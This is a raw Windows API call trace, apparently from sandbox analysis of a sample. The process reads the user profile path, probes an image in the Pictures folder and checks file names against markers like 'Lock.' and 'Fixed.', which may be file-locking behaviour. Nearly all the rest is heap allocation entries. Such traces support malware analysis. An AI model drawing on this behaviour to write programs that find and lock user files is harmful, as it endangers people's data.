RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0210.786] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0210.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa630 [0210.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.786] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0210.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0210.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0210.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0210.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0210.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0210.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0210.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0210.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0210.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.787] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x46) returned 0x2a5dac0 [0210.787] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/LloJL.jpg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\LloJL.jpg", lpFilePart=0x8cf650*="LloJL.jpg") returned 0x22 [0210.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dac0 | out: hHeap=0x2af0000) returned 1 [0210.788] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\LloJL.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\llojl.jpg")) returned 0xffffffff [0210.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.788] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0210.788] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.788] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0210.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LXxgX8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XxgX8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xgX8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gX8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0210.789] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6ee0 [0210.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0210.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LXxgX8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XxgX8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xgX8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gX8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0210.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0210.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0210.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.791] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0210.791] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0210.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0210.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.791] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0210.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0210.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.792] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0210.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0210.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0210.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0210.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0210.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0210.793] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0210.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.793] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0210.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0210.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 